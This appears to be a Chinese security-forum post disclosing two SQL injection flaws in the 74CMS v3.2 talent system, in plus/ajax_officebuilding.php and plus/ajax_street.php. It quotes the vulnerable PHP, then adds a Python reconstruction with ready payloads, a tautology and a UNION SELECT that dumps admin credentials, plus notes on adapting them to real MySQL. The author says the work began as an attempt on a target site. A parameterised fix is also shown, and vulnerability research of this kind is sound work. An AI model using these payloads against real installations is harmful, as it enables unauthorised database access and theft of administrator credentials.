74CMS talent system v3.2 injection & full-version bypass, supplementing the backend bug warning - 黑吧安全网

2013-05-31T00:00:00
ID MYHACK58:62201339045
Type myhack58
Reporter Anonymous (佚名)
Modified 2013-05-31T00:00:00

Description

Because a target site runs this system, and the sibling sites on the same server gave no opening either, I downloaded a copy of the source code to read.

The program's filtering is actually fairly thorough. All versions use GBK encoding, which is its weak spot, but whenever a string goes into the database the author basically runs iconv over the submitted data to convert its encoding to UTF-8.

So wide-character injection is a dead end. The filtering is only thorough before version 3.2, though: the latest 3.2 release adds a few extra files under the plus directory (maybe they changed programmers, who knows). First, two idiotically simple injections.~

Injection 1:

\plus\ajax_officebuilding.php (line 16)

// $act and $listtype come from the request, $db and table() from the framework includes;
// the 'x' parameter is trimmed and dropped straight into the query with no escaping.
if($act == 'alphabet') {
    $alphabet=trim($_GET['x']); // lol, this one is on the programmer, no explanation needed
    if (!empty($alphabet)) {
        $result = $db->query("select * from ".table('category')." where c_alias='QS_officebuilding' AND c_index='{$alphabet}' "); // lol
        while($row = $db->fetch_array($result)) {
            if ($listtype=="li") {
                $htm.="<li title=\"{$row['c_name']}\" id=\"{$row['c_id']}\">{$row['c_name']}</li>";
            } else {
                $htm.="<li><a href=\"?officebuildingid={$row['c_id']}\" title=\"{$row['c_note']}\" class=\"vtip\">{$row['c_name']}</a><span>{$row['stat_jobs']}</span></li>";
            }
        }
        if (empty($htm)) {
            $htm="<span class=\"noinfo\">No office buildings found whose first letter is: <span>{$alphabet}</span>!</span>";
        }
        $htm.="<script type=\"text/javascript\"> vtip();</script>";
        exit($htm);
    }
}

Injection 2:

\plus\ajax_street.php (line 16)

// Same pattern as ajax_officebuilding.php, only the c_alias literal differs.
if($act == 'alphabet') {
    $alphabet=trim($_GET['x']); // almost identical to the injection above, not much to say
    if (!empty($alphabet)) {
        $result = $db->query("select * from ".table('category')." where c_alias='QS_street' AND c_index='{$alphabet}' "); // lol
        while($row = $db->fetch_array($result)) {
            if ($listtype=="li") {
                $htm.="<li title=\"{$row['c_name']}\" id=\"{$row['c_id']}\">{$row['c_name']}</li>";
            } else {
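Both snippets above (ajax_officebuilding.php and ajax_street.php) interpolate trim($_GET['x']) into the WHERE clause with no escaping at all, so the GBK/iconv discussion does not even come into play for this parameter: a plain single quote breaks out of the c_index literal. The example below is added here and is not 74CMS code. It rebuilds the same query construction in Python against an in-memory SQLite database standing in for MySQL; the table name qs_category (table('category') with an assumed "qs_" prefix), the column layout, and the qs_admin table it exfiltrates from are all assumptions modelled on the snippet, and every row is constructed sample data.

```python
import sqlite3

# Constructed rows shaped like the category table the snippet reads (assumed schema).
SAMPLE_CATEGORIES = [
    ("QS_officebuilding", "A", "Alpha Tower", 3),
    ("QS_officebuilding", "B", "Beta Plaza", 5),
    ("QS_street", "A", "Apple Street", 2),
]
# Hypothetical admin table, constructed only to show a UNION-based dump.
SAMPLE_ADMINS = [("admin", "constructed-hash-value")]


def make_db():
    """Build an in-memory database with the two assumed tables (SQLite stands in for MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE qs_category (c_id INTEGER PRIMARY KEY, c_alias TEXT, "
        "c_index TEXT, c_name TEXT, stat_jobs INTEGER)"
    )
    conn.executemany(
        "INSERT INTO qs_category (c_alias, c_index, c_name, stat_jobs) VALUES (?, ?, ?, ?)",
        SAMPLE_CATEGORIES,
    )
    conn.execute("CREATE TABLE qs_admin (a_id INTEGER PRIMARY KEY, a_name TEXT, a_pwd TEXT)")
    conn.executemany("INSERT INTO qs_admin (a_name, a_pwd) VALUES (?, ?)", SAMPLE_ADMINS)
    return conn


def vulnerable_lookup(conn, alias, x):
    """Mirror of the PHP: trim($_GET['x']) is pasted into the SQL text unescaped."""
    alphabet = x.strip()
    if not alphabet:
        return []
    sql = (
        "SELECT * FROM qs_category "
        f"WHERE c_alias='{alias}' AND c_index='{alphabet}' "
    )
    return conn.execute(sql).fetchall()


def safe_lookup(conn, alias, x):
    """Hardened form: the value travels as a bound parameter, never as SQL text."""
    alphabet = x.strip()
    if not alphabet:
        return []
    sql = "SELECT * FROM qs_category WHERE c_alias=? AND c_index=?"
    return conn.execute(sql, (alias, alphabet)).fetchall()


# Payloads an attacker would send as the value of ?x=
TAUTOLOGY = "' OR '1'='1"
# Five expressions to match SELECT * on the assumed 5-column table; the trailing
# comment swallows the closing quote the PHP appends after {$alphabet}.
UNION_DUMP = "' UNION SELECT a_id, 'x', 'x', a_name || ':' || a_pwd, 0 FROM qs_admin -- "


def demo():
    """Run a normal request and the two payloads through both query builders."""
    conn = make_db()
    normal = vulnerable_lookup(conn, "QS_officebuilding", "A")
    tautology = vulnerable_lookup(conn, "QS_officebuilding", TAUTOLOGY)
    dumped = vulnerable_lookup(conn, "QS_officebuilding", UNION_DUMP)
    hardened = safe_lookup(conn, "QS_officebuilding", UNION_DUMP)
    return {
        "normal_rows": len(normal),            # 1: only "Alpha Tower" starts with A
        "tautology_rows": len(tautology),      # 3: OR '1'='1' returns every category
        "dumped_creds": [row[3] for row in dumped],  # admin name:hash via UNION
        "hardened_rows": len(hardened),        # 0: the payload is just an unmatched literal
    }


if __name__ == "__main__":
    print(demo())
```

Against real MySQL the same payloads need MySQL syntax: `#` or `-- ` (with the trailing space) for the comment, CONCAT() instead of `||`, and the UNION column count must match the real category table rather than the five columns assumed here.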

(continued on pages 2 and 3)